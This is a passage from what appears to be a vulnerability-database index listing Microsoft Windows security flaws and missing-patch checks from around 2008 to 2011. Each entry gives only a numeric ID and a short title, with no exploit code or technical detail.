Article 2535512 update is not installed [67727] Microsoft Windows DFS denial of service [67726] Microsoft Windows DFS code execution [67725] Microsoft Windows Knowledge Base Article 2536275 update is not installed [67724] Microsoft Windows SMB request denial of service [67722] Microsoft Windows Knowledge Base Article 2536276 update is not installed [67721] Microsoft Windows SMB responses code execution [67718] Microsoft Windows Knowledge Base Article 2537146 update is not installed [67709] Microsoft Windows Knowledge Base Article 2538814 update is not installed [67520] Microsoft Windows Vista nsiproxy.sys denial of service [67302] Microsoft Windows Knowledge Base Article 2545814 update is not installed [67101] Microsoft Windows Knowledge Base Article 2524426 update is not installed [67100] Microsoft Windows Windows Internet Name Service code execution [66856] Microsoft Windows Media Player .avi buffer overflow [66855] Microsoft Windows Media Player .ogg denial of service [66845] Microsoft Windows Knowledge Base Article 2506014 update is not installed [66844] Microsoft Windows Knowledge Base Article 2501584 update is not installed [66835] Microsoft Windows and Internet Explorer msxml.dll information disclosure [66639] Microsoft Windows XP afd.sys denial of service [66469] Microsoft Windows Explorer Shmedia.dll denial of service [66448] Microsoft Windows Knowledge Base Article 2508272 update is not installed [66447] Microsoft Windows Messenger ActiveX control code execution [66446] Microsoft Windows Knowledge Base Article 2514666 update is not installed [66445] Microsoft Windows VBScript and Jscript code execution [66444] Microsoft Windows Knowledge Base Article 2511455 update is not installed [66443] Microsoft Windows SMB response code execution [66442] Microsoft Windows Knowledge Base Article 2509553 update is not installed [66441] Microsoft Windows DNS resolution code execution [66440] Microsoft Windows Knowledge Base Article 2508429 update is not installed [66439] Microsoft Windows SMB protocol code execution [66438] Microsoft Windows Knowledge Base Article 2507618 update is not installed [66437] Microsoft Windows OpenType buffer overflow [66436] Microsoft Windows Knowledge Base Article 2497640 update is not installed [66432] Microsoft Windows Knowledge Base Article 2527308 update is not installed [66431] Microsoft Windows Fax Cover Page Editor code execution [66430] Microsoft Windows Knowledge Base Article 2503658 update is not installed [66428] Microsoft Windows Knowledge Base Article 2489979 update is not installed [66427] Microsoft Windows GDI+ EMF code execution [66425] Microsoft Windows Knowledge Base Article 2506223 update is not installed [66424] Microsoft Windows kernel-mode driver (win32k.sys) variant 30 privilege escalation [66423] Microsoft Windows kernel-mode driver (win32k.sys) variant 29 privilege escalation [66422] Microsoft Windows kernel-mode driver (win32k.sys) variant 28 privilege escalation [66421] Microsoft Windows kernel-mode driver (win32k.sys) variant 27 privilege escalation [66420] Microsoft Windows kernel-mode driver (win32k.sys) variant 26 privilege escalation [66419] Microsoft Windows kernel-mode driver (win32k.sys) variant 25 privilege escalation [66418] Microsoft Windows kernel-mode driver (win32k.sys) variant 24 privilege escalation [66417] Microsoft Windows kernel-mode driver (win32k.sys) variant 23 privilege escalation [66416] Microsoft Windows kernel-mode driver (win32k.sys) variant 22 privilege escalation [66415] Microsoft Windows kernel-mode driver (win32k.sys) variant 21 privilege escalation [66414] Microsoft Windows kernel-mode driver (win32k.sys) variant 20 privilege escalation [66413] Microsoft Windows kernel-mode driver (win32k.sys) variant 19 privilege escalation [66412] Microsoft Windows kernel-mode driver (win32k.sys) variant 18 privilege escalation [66411] Microsoft Windows kernel-mode driver (win32k.sys) variant 17 privilege escalation [66410] Microsoft Windows kernel-mode driver (win32k.sys) variant 16 privilege escalation [66409] Microsoft Windows kernel-mode driver (win32k.sys) variant 15 privilege escalation [66408] Microsoft Windows kernel-mode driver (win32k.sys) variant 14 privilege escalation [66407] Microsoft Windows kernel-mode driver (win32k.sys) variant 13 privilege escalation [66406] Microsoft Windows kernel-mode driver (win32k.sys) variant 12 privilege escalation [66405] Microsoft Windows kernel-mode driver (win32k.sys) variant 11 privilege escalation [66404] Microsoft Windows kernel-mode driver (win32k.sys) variant 10 privilege escalation [66403] Microsoft Windows kernel-mode driver (win32k.sys) variant 9 privilege escalation [66402] Microsoft Windows kernel-mode driver (win32k.sys) variant 8 privilege escalation [66401] Microsoft Windows kernel-mode driver (win32k.sys) variant 7 privilege escalation [66400] Microsoft Windows kernel-mode driver (win32k.sys) variant 6 privilege escalation [66399] Microsoft Windows kernel-mode driver (win32k.sys) variant 5 privilege escalation [66398] Microsoft Windows kernel-mode driver (win32k.sys) variant 4 privilege escalation [66397] Microsoft Windows kernel-mode driver (win32k.sys) variant 3 privilege escalation [66396] Microsoft Windows kernel-mode driver (win32k.sys) variant 2 privilege escalation [66395] Microsoft Windows kernel-mode driver (win32k.sys) variant 1 privilege escalation [66394] Microsoft Windows Knowledge Base Article 2485663 update is not installed [66312] Microsoft Windows Media Player .ape buffer overflow [66254] Microsoft Windows certificates spoofing [65972] Microsoft Windows mscorsvw.exe privilege escalation [65588] Microsoft Windows Knowledge Base Article 2489279 update is not installed [65581] Microsoft Windows Knowledge Base Article 2510030 update is not installed [65580] Microsoft Windows Knowledge Base Article 2489283 update is not installed [65575] Microsoft Windows Knowledge Base Article 2489293 update is not installed [65573] Microsoft Windows Knowledge Base Article 2494047 update is not installed [65570] Microsoft Windows Knowledge Base Article 2500212 update is not installed [65568] Microsoft Windows Knowledge Base Article 2508062 update is not installed [65567] Microsoft Windows RDC code execution [65495] Microsoft Windows HID weak security [65383] Microsoft Windows Graphics Rendering Engine height integer overflow [65382] Microsoft Windows Graphics Rendering Engine BMP integer overflow [65381] Microsoft Windows Graphics Rendering Engine biCompression buffer overflow [65376] Microsoft Windows Server CIFS code execution [65169] Microsoft Windows Azure information disclosure [65000] Microsoft Windows MHTML information disclosure [64973] Microsoft Windows Knowledge Base Article 2478960 update is not installed [64972] Microsoft Windows LSASS privilege escalation [64971] Microsoft Windows Knowledge Base Article 2479628 update is not installed [64970] Microsoft Windows Win32k.sys privilege escalation [64969] Microsoft Windows classpointer privilege escalation [64968] Microsoft Windows pointer privilege escalation [64967] Microsoft Windows Win32k.sys privilege escalation [64966] Microsoft Windows Win32k.sys privilege escalation [64927] Microsoft Windows Knowledge Base Article 2393802 update is not installed [64926] Microsoft Windows kernel privilege escalation [64925] Microsoft Windows Knowledge Base Article 2451879 update is not installed [64921] Microsoft Windows Media Player and Windows Media Center DVR-MS code execution [64920] Microsoft Windows Knowledge Base Article 2475792 update is not installed [64919] Microsoft Windows VBScript and JScript information disclosure [64918] Microsoft Windows Knowledge Base Article 2476687 update is not installed [64917] Microsoft Windows CSRSS privilege escalation [64916] Microsoft Windows Knowledge Base Article 2478953 update is not installed [64915] Microsoft Windows Active Directory denial of service [64914] Microsoft Windows Knowledge Base Article 2482017 update is not installed [64910] Microsoft Windows Knowledge Base Article 2483185 update is not installed [64909] Microsoft Windows Knowledge Base Article 2484015 update is not installed [64907] Microsoft Windows Knowledge Base Article 2485376 update is not installed [64906] Microsoft Windows OpenType Compact Font Format code execution [64905] Microsoft Windows Knowledge Base Article 2489256 update is not installed [64902] Microsoft Windows Knowledge Base Article 2496930 update is not installed [64901] Microsoft Windows Kerberos spoofing [64900] Microsoft Windows Kerberos checksum privilege escalation [64837] Microsoft Windows Fax Cover Page Editor code execution [64583] Microsoft Windows Neighbor Discovery (ND) protocol denial of service [64474] Microsoft Windows Remote Access Phonebook code execution [64446] Microsoft Windows Contacts DLL code execution [64382] Microsoft Windows Graphics Rendering Engine buffer overflow [64342] Microsoft Windows Knowledge Base Article 2451910 update is not installed [64339] Microsoft Windows Knowledge Base Article 2478935 update is not installed [64307] Microsoft Windows Windows Fax Cover Page Editor component buffer overflow [63909] Microsoft Windows dynamic-linked library (oci.dll) code execution [63816] Microsoft Windows Media Encoder 9 dynamic-linked library (DLL) code execution [63807] Microsoft Windows Mail dynamic-linked library (wab32res.dll) code execution [63803] Microsoft Windows Live Messenger dynamic-linked library (msgsres.dll) code execution [63788] Microsoft Windows Backup dynamic-linked library (fveapi.dll) code execution [63787] Microsoft Windows Internet Communication Settings dynamic-linked library (schannel.dll) code execution [63779] Microsoft Windows Indeo Filter dynamic-linked library (iacenc.dll) code execution [63776] Microsoft Windows Program Group Converter dynamic-linked library (DLL) code execution [63773] Microsoft Windows Address Book dynamic-linked library (wab32res.dll) code execution [63586] Microsoft Windows Knowledge Base Article 2207559 update is not installed [63585] Microsoft Windows Netlogon denial of service [63584] Microsoft Windows Knowledge Base Article 2424434 update is not installed [63583] Microsoft Windows Movie Maker insecure library loading code execution [63582] Microsoft Windows Knowledge Base Article 2423089 update is not installed [63580] Microsoft Windows Knowledge Base Article 2436673 update is not installed [63579] Microsoft Windows user mode privilege escalation [63578] Microsoft Windows cursor privilege escalation [63577] Microsoft Windows WriteAV privilege escalation [63576] Microsoft Windows pointer privilege escalation [63575] Microsoft Windows double free privilege escalation [63574] Microsoft Windows kernel-mode drivers buffer overflow [63573] Microsoft Windows Knowledge Base Article 2407132 update is not installed [63571] Microsoft Windows Knowledge Base Article 2440591 update is not installed [63570] Microsoft Windows NDProxy buffer overflow [63569] Microsoft Windows Knowledge Base Article 2385678 update is not installed [63568] Microsoft Windows BranchCache code execution [63566] Microsoft Windows Knowledge Base Article 2442962 update is not installed [63565] Microsoft Windows Consent User Interface privilege escalation [63564] Microsoft Windows Knowledge Base Article 2345316 update is not installed [63563] Microsoft Windows Server Hyper-V VMBus denial of service [63562] Microsoft Windows Knowledge Base Article 2296199 update is not installed [63561] Microsoft Windows OpenType Font (OTF) CMAP code execution [63560] Microsoft Windows OpenType Font (OTF) format driver code execution [63559] Microsoft Windows OpenType Font (OTF) format driver code execution [63558] Microsoft Windows Knowledge Base Article 2416400 update is not installed [63550] Microsoft Windows Knowledge Base Article 2447961 update is not installed [63549] Microsoft Windows Media Encoder code execution [63548] Microsoft Windows Knowledge Base Article 2443105 update is not installed [63547] Microsoft Windows Internet Signup code execution [63546] Microsoft Windows Knowledge Base Article 2455005 update is not installed [63544] Microsoft Windows Knowledge Base Article 2292970 update is not installed [63538] Microsoft Windows Knowledge Base Article 968095 update is not installed [63450] Microsoft Windows REG_BINARY privilege escalation [62805] Microsoft Windows Knowledge Base Article 2316074 update is not installed [62797] Microsoft Windows Knowledge Base Article 2305420 update is not installed [62796] Microsoft Windows Task Scheduler privilege escalation [62793] Microsoft Windows Knowledge Base Article 2293386 update is not installed [62789] Microsoft Windows Knowledge Base Article 2423930 update is not installed [62737] Microsoft WindowsTask Scheduler service privilege escalation [62716] Microsoft Windows Mobile .vcf denial of service [62643] Microsoft Windows unspecified privilege escalation [62642] Microsoft Windows unspecified privilege escalation [62170] Microsoft Windows Knowledge Base Article 2296011 update is not installed [62169] Microsoft Windows Explorer buffer overflow [62166] Microsoft Windows Knowledge Base Article 2294255 update is not installed [62165] Microsoft Windows Failover Cluster Manager insecure permissions [62163] Microsoft Windows Knowledge Base Article 2281679 update is not installed [62162] Microsoft Windows Media Player RTSP code execution [62154] Microsoft Windows Knowledge Base Article 2279986 update is not installed [62153] Microsoft Windows OpenType Font fonts privilege escalation [62152] Microsoft Windows OpenType Font privilege escalation [62149] Microsoft Windows Knowledge Base Article 2207566 update is not installed [62148] Microsoft Windows SChannel denial of service [62147] Microsoft Windows Knowledge Base Article 2160841 update is not installed [62143] Microsoft Windows Knowledge Base Article 982132 update is not installed [62142] Microsoft Windows OpenType table code execution [62138] Microsoft Windows Knowledge Base Article 981957 update is not installed [62137] Microsoft Windows class privilege escalation [62135] Microsoft Windows keyboard privilege escalation [62134] Microsoft Windows Knowledge Base Article 2412048 update is not installed [62133] Microsoft Windows Knowledge Base Article 2405882 update is not installed [62129] Microsoft Windows Knowledge Base Article 2387149 update is not installed [62126] Microsoft Windows Knowledge Base Article 2378111 update is not installed [62125] Microsoft Windows Media Player code execution [62123] Microsoft Windows Knowledge Base Article 2360937 update is not installed [62118] Microsoft Windows Knowledge Base Article 2293211 update is not installed [62104] Microsoft Windows Knowledge Base Article 2360131 update is not installed [62103] Microsoft Windows LPC message privilege escalation [62098] Microsoft Windows Knowledge Base Article 2293194 update is not installed [62069] Microsoft Windows Knowledge Base Article 2418042 update is not installed [62006] Microsoft Windows unspecified privilege escalation [61994] Microsoft Windows MPEG Layer-3 Audio Decoder denial of service [61519] Microsoft Windows Knowledge Base Article 2121546 update is not installed [61518] Microsoft Windows CSRSS privilege escalation [61517] Microsoft Windows Knowledge Base Article 2259922 update is not installed [61514] Microsoft Windows Knowledge Base Article 2267960 update is not installed [61510] Microsoft Windows Knowledge Base Article 2315011 update is not installed [61507] Microsoft Windows Knowledge Base Article 2320113 update is not installed [61506] Microsoft Windows Unicode Scripts Processor code execution [61504] Microsoft Windows Knowledge Base Article 2347290 update is not installed [61503] Microsoft Windows Print Spooler service code execution [61501] Microsoft Windows Knowledge Base Article 975558 update is not installed [61500] Microsoft Windows MPEG-4 code execution [61499] Microsoft Windows Knowledge Base Article 982802 update is not installed [61498] Microsoft Windows RPC code execution [61258] Microsoft Windows IcmpSendEcho2Ex denial of service [61187] Microsoft Windows xxxRealDrawMenuItem() privilege escalation [61184] Microsoft Windows win32k!GreStretchBltInternal() denial of service [61129] Microsoft Windows Kerberos security bypass [60975] Microsoft Windows CreateDIBPalette() buffer overflow [60736] Microsoft Windows Knowledge Base Article 2265906 update is not installed [60734] Microsoft Windows Knowledge Base Article 2269638 update is not installed [60728] Microsoft Windows Knowledge Base Article 2269707 update is not installed [60724] Microsoft Windows Knowledge Base Article 2286198 update is not installed [60723] Microsoft Windows Knowledge Base Article 978886 update is not installed [60722] Microsoft Windows TCP/IP input buffer privilege escalation [60721] Microsoft WindowsTCP/IP IPv6 denial of service [60719] Microsoft Windows Knowledge Base Article 980436 update is not installed [60718] Microsoft Windows SChannel code execution [60713] Microsoft Windows Knowledge Base Article 2183461 update is not installed [60705] Microsoft Windows Knowledge Base Article 981852 update is not installed [60704] Microsoft Windows kernel ACL denial of service [60703] Microsoft Windows kernel errors privilege escalation [60702] Microsoft Windows kernel threads privilege escalation [60701] Microsoft Windows Knowledge Base Article 981997 update is not installed [60700] Microsoft Windows Movie Maker code execution [60698] Microsoft Windows Knowledge Base Article 2160329 update is not installed [60697] Microsoft Windows kernel-mode drivers window privilege escalation [60696] Microsoft Windows kernel-mode drivers input privilege escalation [60695] Microsoft Windows kernel-mode drivers memory privilege escalation [60694] Microsoft Windows kernel-mode drivers exception privilege escalation [60693] Microsoft Windows kernel-mode drivers denial of service [60692] Microsoft Windows Knowledge Base Article 982214 update is not installed [60691] Microsoft Windows SMB stack denial of service [60690] Microsoft Windows SMB variable denial of service [60689] Microsoft Windows SMB pool code execution [60688] Microsoft Windows Knowledge Base Article 982665 update is not installed [60687] Microsoft Windows Cinepak Codec code execution [60686] Microsoft Windows Knowledge Base Article 2115168 update is not installed [60685] Microsoft Windows MPEG Layer-3 Codecs code execution [60684] Microsoft Windows Knowledge Base Article 2079403 update is not installed [60683] Microsoft Windows XML Core Services (MSXML) code execution [60682] Microsoft Windows Knowledge Base Article 982799 update is not installed [60681] Microsoft Windows Tracing Feature privilege escalation [60680] Microsoft Windows Knowledge Base Article 2264072 update is not installed [60679] Microsoft Windows registry key ACL privilege escalation [60678] Microsoft Windows Service Isolation privilege escalation [60677] Microsoft Windows Knowledge Base Article 983539 update is not installed [60676] Microsoft Windows LSASS privilege escalation [60422] Microsoft Windows .lnk file code execution [60120] Microsoft Windows NtUserCheckAccessForIntegrityLevel() privilege escalation [60095] Microsoft Windows UpdateFrameTitleForDocument() buffer overflow [59901] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59898] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59895] Microsoft Windows Knowledge Base Article 978212 update is not installed [59891] Microsoft Windows Knowledge Base Article 982335 update is not installed [59447] Microsoft Windows Help and Support Center GetServerName cross-site scripting [59267] Microsoft Windows helpctr.exe command execution [58944] Microsoft Windows Knowledge Base Article 979902 update not installed [58943] Microsoft Windows MJPEG code execution [58942] Microsoft Windows media files code execution [58913] Microsoft Windows Knowledge Base Article 2027452 update is not installed [58891] Microsoft Windows Knowledge Base Article 2028554 update is not installed [58887] Microsoft Windows kernel-mode drivers TrueType privilege escalation [58885] Microsoft Windows Knowledge Base Article 980218 update is not installed [58884] Microsoft Windows OpenType Compact Font Format privilege escalation [58883] Microsoft Windows Knowledge Base Article 981343 update is not installed [58871] Microsoft Windows Knowledge Base Article 982381 update is not installed [58865] Microsoft Windows Knowledge Base Article 982666 update is not installed [58863] Microsoft Windows Knowledge Base Article 983235 update is not installed [58622] Microsoft Windows Canonical Display Driver (cdd.dll) code execution [58345] Microsoft Windows SMTP Service query id spoofing [58344] Microsoft Windows SMTP Service DNS spoofing [58243] Microsoft Office SharePoint Server and Microsoft Windows SharePoint Services help.aspx cross-site scripting [58173] Microsoft Windows Knowledge Base Article 978542 update is not installed [58172] Microsoft Outlook Express and Windows Mail client integer overflow [58171] Microsoft Windows Knowledge Base Article 978213 update is not installed [58060] Microsoft Windows SfnINSTRING() privilege escalation [58059] Microsoft Windows SfnLOGONNOTIFY() denial of service [57601] Microsoft Windows kernel exceptions denial of service [57600] Microsoft Windows kernel image file denial of service [57599] Microsoft Windows kernel path denial of service [57597] Microsoft Windows kernel registry keys denial of service [57596] Microsoft Windows kernel symbolic links denial of service [57595] Microsoft Windows kernel registry keys denial of service [57580] Microsoft Windows Knowledge Base Article 981210 update is not installed [57579] Microsoft Windows Cabinet File Viewer (cabview.dll) code execution [57578] Microsoft Windows WinVerifyTrust signature validation code execution [57380] Microsoft Windows Knowledge Base Article 979683 update is not installed [57379] Microsoft Windows kernel symbolic link privilege escalation [57378] Microsoft Windows kernel memory privilege escalation [57377] Microsoft Windows Knowledge Base Article 979559 update is not installed [57376] Microsoft Windows kernel-mode drivers windows privilege escalation [57375] Microsoft Windows kernel-mode drivers objects privilege escalation [57374] Microsoft Windows Knowledge Base Article 977816 update is not installed [57372] Microsoft Windows Knowledge Base Article 978338 update is not installed [57370] Microsoft Windows ISATAP IPv6 spoofing [57343] Microsoft Windows Knowledge Base Article 979402 update is not installed [57342] Microsoft Windows Media Player ActiveX control code execution [57341] Microsoft Windows Knowledge Base Article 980094 update is not installed [57337] Microsoft Windows Knowledge Base Article 980195 update is not installed [57336] Microsoft Windows Knowledge Base Article 980232 update is not installed [57335] Microsoft Windows SMB message code execution [57334] Microsoft Windows SMB transaction responses code execution [57333] Microsoft Windows SMB code execution [57332] Microsoft Windows SMB memory privilege escalation [57330] Microsoft Windows Knowledge Base Article 980858 update is not installed [57329] Microsoft Windows Media Services info packets buffer overflow [57328] Microsoft Windows Knowledge Base Article 981160 update is not installed [57326] Microsoft Windows Knowledge Base Article 981169 update is not installed [57325] Microsoft Windows Knowledge Base Article 981832 update is not installed [57324] Microsoft Windows SMTP Service Simple Mail Transfer Protocol memory information disclosure [57323] Microsoft Windows SMTP Service and Microsoft Exchange SMTP DNS Mail Exchanger (MX) denial of service [57322] Microsoft Windows Knowledge Base Article 980182 update is not installed [57205] Microsoft Windows Media Player .AVI code execution [56853] Microsoft Windows MS HTML Help ActiveX control (hhctrl.ocx) HtmlHelpA() code execution [56756] Microsoft Windows .ani file denial of service [56591] Microsoft Windows API denial of service [56560] Microsoft Windows winhlp32.exe buffer overflow [56558] Microsoft Windows MsgBox() code execution [56470] Microsoft Windows Knowledge Base Article 980150 update is not installed [56461] Microsoft Windows Knowledge Base Article 975561 update is not installed [56435] Microsoft Windows Media Player .mpg denial of service [56218] Microsoft Windows DNS weak security [55935] Microsoft Windows Knowledge Base Article 975713 update is not installed [55934] Microsoft Windows Knowledge Base Article 978037 update is not installed [55933] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) privilege escalation [55932] Microsoft Windows Knowledge Base Article 978214 update is not installed [55930] Microsoft Windows Knowledge Base Article 977935 update is not installed [55928] Microsoft Windows Knowledge Base Article 978706 update is not installed [55926] Microsoft Windows Knowledge Base Article 977894 update is not installed [55925] Microsoft Windows Hyper-V instruction set denial of service [55924] Microsoft Windows Knowledge Base Article 977377 update is not installed [55923] Microsoft Windows Knowledge Base Article 977290 update is not installed [55922] Microsoft Windows Kerberos Ticket-Granting-Ticket (TGT) denial of service [55921] Microsoft Windows Knowledge Base Article 977165 update is not installed [55920] Microsoft Windows kernel privilege escalation [55917] Microsoft Windows Knowledge Base Article 978262 update is not installed [55910] Microsoft Windows Knowledge Base Article 971468 update is not installed [55909] Microsoft Windows SMB NTLM privilege escalation [55908] Microsoft Windows SMB NULL denial of service [55907] Microsoft Windows SMB denial of service [55906] Microsoft Windows SMB pathname code execution [55898] Microsoft Windows Knowledge Base Article 974145 update is not installed [55897] Microsoft Windows TCP/IP SACK denial of service [55896] Microsoft Windows TCP/IP Route Information code execution [55895] Microsoft Windows TCP/IP stack datagram code execution [55894] Microsoft Windows TCP/IP ICMPv6 code execution [55890] Microsoft Windows Knowledge Base Article 975416 update is not installed [55779] Microsoft Windows Knowledge Base Article 978207 update is not installed [55742] Microsoft Windows #GP trap handler privilege escalation [55680] Microsoft Windows Media Player ActiveX control code execution [55560] Microsoft Windows XP Flash Player code execution [55153] Microsoft Windows Knowledge Base Article 978251 update is not installed [55152] Microsoft Windows Server Message Block client code execution [55151] Microsoft Windows Server Message Block pool code execution [55150] Microsoft Windows Knowledge Base Article 972270 update is not installed [55149] Microsoft Windows EOT font buffer overflow [54645] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54644] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54643] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54642] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54445] Microsoft Windows Knowledge Base Article 975539 update is not installed [54443] Microsoft Windows Knowledge Base Article 974392 update is not installed [54442] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [54440] Microsoft Windows Knowledge Base Article 974318 update is not installed [54439] Microsoft Windows Internet Authentication Service (IAS) privilege escalation [54438] Microsoft Windows Internet Authentication Service (IAS) code execution [54427] Microsoft Windows Knowledge Base Article 971726 update is not installed [54426] Microsoft Windows Active Directory Federation Services (ADFS) code execution [54425] Microsoft Windows Active Directory Federation Services (ADFS) spoofing [54424] Microsoft Windows Knowledge Base Article 967183 update is not installed [54422] Microsoft Windows Knowledge Base Article 976325 update is not installed [54217] Microsoft Windows KeAccumulateTicks() denial of service [54012] Microsoft Windows Knowledge Base Article 972652 update is not installed [53991] Microsoft Windows Knowledge Base Article 973309 update is not installed [53990] Microsoft Windows ADAM LDAP denial of service [53986] Microsoft Windows Knowledge Base Article 973565 update is not installed [53985] Microsoft Windows WSDAPI code execution [53981] Microsoft Windows Knowledge Base Article 974783 update is not installed [53980] Microsoft Windows 2000 License Logging Server buffer overflow [53977] Microsoft Windows Knowledge Base Article 976307 update is not installed [53975] Microsoft Windows Knowledge Base Article 969947 update is not installed [53974] Microsoft Windows kernel font code execution [53973] Microsoft Windows kernel GDI privilege escalation [53972] Microsoft Windows kernel NULL pointer privilege escalation [53551] Microsoft Windows Knowledge Base Article KB973525 update is not installed [53550] Microsoft Windows Knowledge Base Article 974112 update is not installed [53549] Microsoft Windows Media Player ASF file buffer overflow [53548] Microsoft Windows Knowledge Base Article 971486 update is not installed [53547] Microsoft Windows kernel exception handler denial of service [53546] Microsoft Windows kernel user mode privilege escalation [53545] Microsoft Windows kernel 64-bit truncation privilege escalation [53544] Microsoft Windows Knowledge Base Article 974455 update is not installed [53541] Microsoft Windows Knowledge Base Article 969059 update is not installed [53540] Microsoft Windows Indexing Service ActiveX control code execution [53537] Microsoft Windows Knowledge Base Article 974571 update is not installed [53536] Microsoft Windows CryptoAPI ASN.1 spoofing [53535] Microsoft Windows CryptoAPI NULL spoofing [53534] Microsoft Windows Knowledge Base Article 975254 update is not installed [53533] Microsoft Windows Knowledge Base Article 957488 update is not installed [53531] Microsoft Windows GDI+ Microsoft Office file code execution [53530] Microsoft Windows GDI+ PNG image code execution [53529] Microsoft Windows GDI+ .NET Framework API code execution [53528] Microsoft Windows GDI+ TIFF image code execution [53527] Microsoft Windows GDI+ TIFF image buffer overflow [53526] Microsoft Windows GDI+ PNG image buffer overflow [53525] Microsoft Windows GDI+ WMF image code execution [53522] Microsoft Windows Knowledge Base Article 975517 update is not installed [53517] Microsoft Windows Knowledge Base Article 975682 update is not installed [53516] Microsoft Windows Media Player audio files code execution [53514] Microsoft Windows Media Player ASF code execution [53512] Microsoft Windows Knowledge Base Article 975467 update is not installed [53511] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [53090] Microsoft Windows srv2.sys code execution [52948] Microsoft Windows Knowledge Base Article 973965 update is not installed [52775] Microsoft Windows Knowledge Base Article 973812 update is not installed [52774] Microsoft Windows Media Format MP3 files code execution [52773] Microsoft Windows Media Format ASF files code execution [52771] Microsoft Windows Knowledge Base Article 971961 update is not installed [52770] Microsoft Windows Jscript code execution [52403] Microsoft Windows OpenType font engine denial of service [52137] Microsoft Windows Knowledge Base Article 969706 update is not installed [52131] Microsoft Windows Knowledge Base Article 972260 update is not installed [52128] Microsoft Windows Knowledge Base Article 967723 update is not installed [52127] Microsoft Windows TCP/IP orphaned connections denial of service [52126] Microsoft Windows TCP/IP timestamps code execution [52117] Microsoft Windows Knowledge Base Article 970927 update is not installed [52116] Microsoft Windows RDP Services Client ActiveX control buffer overflow [52115] Microsoft Windows Remote Desktop Connection RDP buffer overflow [52114] Microsoft Windows Knowledge Base Article 970957 update is not installed [52113] ASP.NET Framework component of Microsoft Windows HTTP denial of service [52111] Microsoft Windows Knowledge Base Article 969883 update is not installed [52110] Microsoft Windows Windows Internet Name Service (WINS) replication partner buffer overflow [52109] Microsoft Windows Windows Internet Name Service (WINS) replication buffer overflow [52108] Microsoft Windows Knowledge Base Article 960859 update is not installed [52107] Microsoft Windows Knowledge Base Article 971032 update is not installed [52104] Microsoft Windows telnet privilege escalation [52103] Microsoft Windows Knowledge Base Article 956844 update is not installed [52102] Microsoft Windows DHTML Editing Component ActiveX control code execution [52097] Microsoft Windows Knowledge Base Article 971557 update is not installed [52096] Microsoft Windows AVI validation integer overflow [52095] Microsoft Windows AVI code execution [52093] Microsoft Windows Knowledge Base Article 971657 update is not installed [52092] Microsoft Windows Workstation Service RPC message code execution [52089] Microsoft Windows Knowledge Base Article 973908 update is not installed [51636] Microsoft Windows Knowledge Base Article KB973346 update is not installed [51471] Microsoft Windows Knowledge Base Article 970811 update is not installed [51469] Microsoft Windows Knowledge Base Article 970710 update is not installed [51468] Microsoft Windows Wireless LAN AutoConfig service buffer overflow [51465] Microsoft Windows Knowledge Base Article 969856 update is not installed [51463] Microsoft Windows Knowledge Base Article 971633 update is not installed [51462] Microsoft Windows Knowledge Base Article 969516 update is not installed [51457] Microsoft Windows Knowledge Base Article 957638 update is not installed [51097] Microsoft Windows atapi.sys privilege escalation [51034] Microsoft PowerPoint Freelance Windows buffer overflow [50973] Microsoft Windows Server 2003 and Vista win32k.sys denial of service [50903] Microsoft Windows SPI_SETDESKWALLPAPER SystemParametersInfo denial of service [50826] Microsoft Windows Knowledge Base Article 969898 update is not installed [50798] Microsoft Windows Knowledge Base Article 970238 update is not installed [50797] Microsoft Windows RPC Marshalling Engine code execution [50795] Microsoft Windows Knowledge Base Article 969514 update is not installed [50791] Microsoft Windows Knowledge Base Article 969462 update is not installed [50783] Microsoft Windows Knowledge Base Article 968537 update is not installed [50782] Microsoft Windows desktop parameter privilege escalation [50781] Microsoft Windows system call privilege escalation [50780] Microsoft Windows kernel pointer privilege escalation [50779] Microsoft Windows kernel kernel objects privilege escalation [50778] Microsoft Windows Knowledge Base Article 963093 update is not installed [50777] Microsoft Windows Search weak security [50776] Microsoft Windows Knowledge Base Article 969897 update is not installed [50768] Microsoft Windows Knowledge Base Article 970483 update is not installed [50767] Microsoft Windows Knowledge Base Article 971055 update is not installed [50766] Microsoft Windows Knowledge Base Article 961501 update is not installed [50765] Microsoft Windows Print Spooler service privilege escalation [50763] Microsoft Windows Print Spooler service buffer overflow [50762] Microsoft Windows Knowledge Base Article 961371 update is not installed [50761] Microsoft Windows Active Directory LDAP denial of service [50760] Microsoft Windows Embedded OpenType (EOT) integer overflow [50759] Microsoft Windows 2000 Active Directory LDAP code execution [50758] Microsoft Windows EOT buffer overflow [50757] Microsoft Windows Knowledge Base Article 957632 update is not installed [50391] Microsoft Windows Media Player MID file denial of service [50281] Microsoft Windows Knowledge Base Article 967340 update is not installed [50129] Microsoft Windows gdiplus.dll PNG denial of service [49598] Microsoft Windows Knowledge Base Article 959426 update is not installed [49588] Microsoft Windows Knowledge Base Article 960477 update is not installed [49586] Microsoft Windows Knowledge Base Article 959454 update is not installed [49584] Microsoft Windows Threadpool ACL privilege escalation [49581] Microsoft Windows RPCSS privilege escalation [49578] Microsoft Windows WMI privilege escalation [49570] Microsoft Windows Knowledge Base Article 961759 update is not installed [49569] Microsoft Windows Knowledge Base Article 960803 update is not installed [49566] Microsoft Windows HTTP services certificate spoofing [49562] Microsoft Windows HTTP services integer underflow [49560] Microsoft Windows Knowledge Base Article 961373 update is not installed [49558] Microsoft Windows Knowledge Base Article 963027 update is not installed [49547] Microsoft Windows Knowledge Base Article 968557 update is not installed [49438] Microsoft Windows GDI+ EMF EmfPlusFont Object denial of service [49435] Microsoft Windows unlzh.c and unpack.c gzip code execution [49079] Microsoft Windows DNS server memory leak denial of service [48909] Microsoft Windows Knowledge Base Article 962238 update is not installed [48908] Microsoft Windows WINS server WPAD and ISATAP registration Web proxy spoofing [48907] Microsoft Windows DNS server WPAD registration Web proxy spoofing [48906] Microsoft Windows DNS server cache response spoofing [48905] Microsoft Windows DNS server query response spoofing [48392] Microsoft Windows I/O information disclosure [48326] Microsoft Windows Knowledge Base Article 960715 update is not installed [48312] Microsoft Windows Knowledge Base Article 959420 update is not installed [48311] Microsoft Windows Knowledge Base Article 961260 update not installed [48308] Microsoft Windows Knowledge Base Article 960225 update is not installed [48307] Microsoft Windows SChannel certificate spoofing [48302] Microsoft Windows Knowledge Base Article 957634 update not installed 